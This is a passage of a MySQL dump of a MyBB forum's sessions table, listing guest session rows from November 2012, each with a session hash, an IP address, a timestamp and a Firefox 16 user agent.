`mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4fb8aeefcd617842023ec945b76e3842', '0', '219.222.46.203', '1352771296', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('da3c262b5eed4c3f1100038c1b3473a2', '0', '195.129.190.207', '1352771296', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('93814e45db39c3aadb7fc61222eb5f50', '0', '102.56.248.226', '1352771297', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('543dca1584352eee8202715aa98ea94d', '0', '140.102.171.221', '1352771298', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('437d31d90436c9ef4f8e3962761f2a37', '0', '253.254.224.61', '1352771298', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e571577f55604a5165b871425d117f05', '0', '24.106.189.22', '1352771299', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c97b22ec20fb82f2ebd838034fa1d2f5', '0', '97.203.39.25', '1352771300', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4e6ab89a75a4f1b25830ab1136403bdb', '0', '96.56.57.110', '1352771305', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3fb320c3ea22c1c84510ba1fa29aefb5', '0', '21.64.210.74', '1352771308', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0fff3f577d9dceccb76f523fecac8dee', '0', '231.53.172.127', '1352771310', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('abf516fafddfd3d4069fd846fa117865', '0', '26.172.78.65', '1352771311', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3ad839b157dd490b9cbb7609e4c7287e', '0', '244.205.144.108', '1352771312', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('379037280990629b2fc493a0859539fa', '0', '241.109.78.161', '1352771316', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ef2445857a20a4bab62f862b795b34b9', '0', '16.237.18.124', '1352771317', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('822f71bc20431548991ea0c13486b6a0', '0', '211.146.96.170', '1352771318', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a49ff31bd420b193f136c2bbe769d04e', '0', '244.178.29.189', '1352771318', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bfc529e3fc0093fe91d0b68cae5ba32b', '0', '77.47.145.13', '1352771319', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('adf404f1d87d7e9be27e66f362506fa1', '0', '175.1.80.127', '1352771319', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e48ad04c8945e2cc0efbb16e21341c9e', '0', '81.153.207.146', '1352771323', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d6aca4f30663f84bfde32e26832c04af', '0', '51.191.209.229', '1352771327', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e1fd64bfcd84492b8236d06b28535a0f', '0', '40.29.237.187', '1352771327', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ef7a2be002635c112ab48dbfe6408e23', '0', '38.233.31.162', '1352771328', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('060429492c704cf838b82cb34705bd3a', '0', '214.138.110.119', '1352771329', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('850cab94a496e88df33d250c2bbf8981', '0', '33.63.149.212', '1352771329', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('32bdad150f2e87ccd96dc17e5faa1492', '0', '29.245.36.17', '1352771330', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bb61530c35fdfa16720b42b547e35fdd', '0', '66.210.43.24', '1352771330', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('636459de1afa706739e9999d284f2b11', '0', '203.93.1.23', '1352771331', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e4d7a128fb4dc37859c2cef6bef890a0', '0', '220.119.247.25', '1352771332', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0b7fcc6e5caf045411bd324e2b286fe5', '0', '225.179.245.62', '1352771332', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('466b17a98bc594e41fc8fe9e73f918ac', '0', '7.146.63.6', '1352771333', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d75aa328fa8bec8a31adafb09ec583c1', '0', '207.95.178.8', '1352771333', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0c6ed7e7c8985bea9ce8ea2a14b5f70f', '0', '24.210.82.143', '1352771334', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d0a373e205c7cfe7b1de32ecf973616f', '0', '206.27.131.8', '1352771335', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5684e8a649275f6b788a5cae07fb7b4e', '0', '165.250.238.13', '1352771335', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e2da489d9a8121aac0d5bc07312bd5bc', '0', '35.241.104.253', '1352771340', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6771eb2a3b63f731d6c603f9ffc053bf', '0', '196.74.160.131', '1352771342', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7ff76e2eaa04d2b7c10c131c21b6456a', '0', '199.167.237.3', '1352771346', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e4dbccacadbbb85d923aea697398e92b', '0', '157.165.215.170', '1352771346', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('39bbec3cbe1e5e5342a7c2b2c1e93c53', '0', '179.166.252.212', '1352771347', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('130975b148c323e3d7f7242c3bec7eca', '0', '236.253.118.222', '1352771350', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0d5b2dd295912481004ef46c9553f9db', '0', '68.68.79.59', '1352771352', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ac56d4232123ae5b307fd2964c3795c7', '0', '36.137.115.129', '1352771352', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('72543a6b52332b2fa7f4be1bb665df18', '0', '193.74.18.246', '1352771353', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9cb4d3c53eb31ad7421eb7947efe9500', '0', '35.214.68.182', '1352771353', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9e0790695443ea28cc4dbdcf165d0fb9', '0', '193.165.252.75', '1352771354', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('60573db37077d96ac00caba6b6c5723c', '0', '6.189.144.117', '1352771355', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ee1fdf070f6efa4c368e1a31cdd3cac7', '0', '112.86.189.241', '1352771356', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f3a5dca81cf8bb393ebb922d59e9673f', '0', '40.230.150.105', '1352771356', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('aa96f39e0acb3204d4af4919a26f8408', '0', '178.152.246.195', '1352771357', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('10ab7ce6bece1a9d6035fa9726b40ff7', '0', '182.74.239.125', '1352771358', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('04eaac1130486d71ba5f6814acf03ae3', '0', '27.26.113.27', '1352771359', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6d9f920e819ac8fa2f35fd29f7209b8f', '0', '227.126.201.40', '1352771360', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('329d19830d1ee5ed6303bf9617d19c9a', '0', '7.249.38.145', '1352771361', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('34b4579147a3390cb6b3f5de1c0f98fa', '0', '177.42.161.62', '1352771361', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('20a0029dd33847b6fd4ae3aa5c4a2e20', '0', '97.78.230.7', '1352771364', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7f2e87da243b08a0ffdbb6bc9bd25fca', '0', '11.199.44.123', '1352771370', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2dffecca2280dfb6871a4f0077a38401', '0', '24.206.88.111', '1352771371', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1b87a6dd7f0a6e1515958cc5eaa46a36', '0', '201.131.104.32', '1352771371', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0d4b0f845bc0ca6b0acaa1ea6cbfc960', '0', '83.74.189.204', '1352771372', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0a25271689c7fc42b78e67a60947df34', '0', '126.115.230.39', '1352771373', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7fe07d97eb643e2713d879f1c3e57747', '0', '238.245.129.174', '1352771373', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2dc74bb357b587c80a9f927545a76e72', '0', '223.110.189.99', '1352771374', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('91d7fa35d15088d27ea1a136d50f81fe', '0', '200.192.171.88', '1352771375', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('13727e2e57d9dc19759359950d17b296', '0', '214.116.52.48', '1352771375', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3e612f3342867bea4dc57c2bb723f2f2', '0', '165.78.20.137', '1352771376', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('82120dba301027a243483d36027f40a2', '0', '144.115.144.30', '1352771377', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('23a39825368daa14a28ac76f221bf3ad', '0', '84.24.179.196', '1352771378', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('db4d1dcf7846f982d4d840368dfdfa61', '0', '174.78.163.0', '1352771378', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dbc7a28ed054530b1a92998e6a499aac', '0', '35.147.205.132', '1352771383', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d00f3ab9405437c857183f4b10369486', '0', '138.50.66.162', '1352771386', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2dab9ddc13b11c63124b1d08ba2c78ab', '0', '150.199.200.153', '1352771379', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('83bbdc602d806b584d409bfe13d40d00', '0', '137.54.176.94', '1352771380', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('04ab127d39a0cb932410ca88944764f6', '0', '166.32.188.41', '1352771387', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('af56e594b10e25e0259c254e664b844c', '0', '96.188.181.154', '1352771389', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('05ab49ee4ef30454e8606a40e0e83c8c', '0', '30.242.44.143', '1352771390', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('278601223a79c69e8cb7ce8262c9ccb8', '0', '155.185.24.224', '1352771390', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7fdda25027aad701325ad0d3d022ee65', '0', '31.180.44.88', '1352771391', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0ab8c3f2b1b214953edd6473166995df', '0', '118.53.26.208', '1352771392', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a93c322801f8853c3ccd070c71d94fcb', '0', '151.243.233.131', '1352771392', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, 